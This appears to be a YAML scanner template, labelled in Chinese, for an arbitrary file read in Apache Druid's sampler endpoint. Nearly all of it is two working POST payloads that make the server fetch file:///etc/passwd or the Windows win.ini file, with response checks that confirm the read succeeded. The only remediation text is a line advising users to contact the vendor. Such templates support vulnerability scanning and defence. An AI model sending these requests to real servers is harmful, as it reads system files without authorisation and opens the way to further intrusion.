product: Apache-Druid
vName: Apache-Druid sampler文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /druid/indexer/v1/sampler?for=connect
      json: '{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
          header:
            value:
              - Content-Type
              - json
            logic: and
  - exp:
      method: post
      follow: false
      path: /druid/indexer/v1/sampler?for=connect
      json: '{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and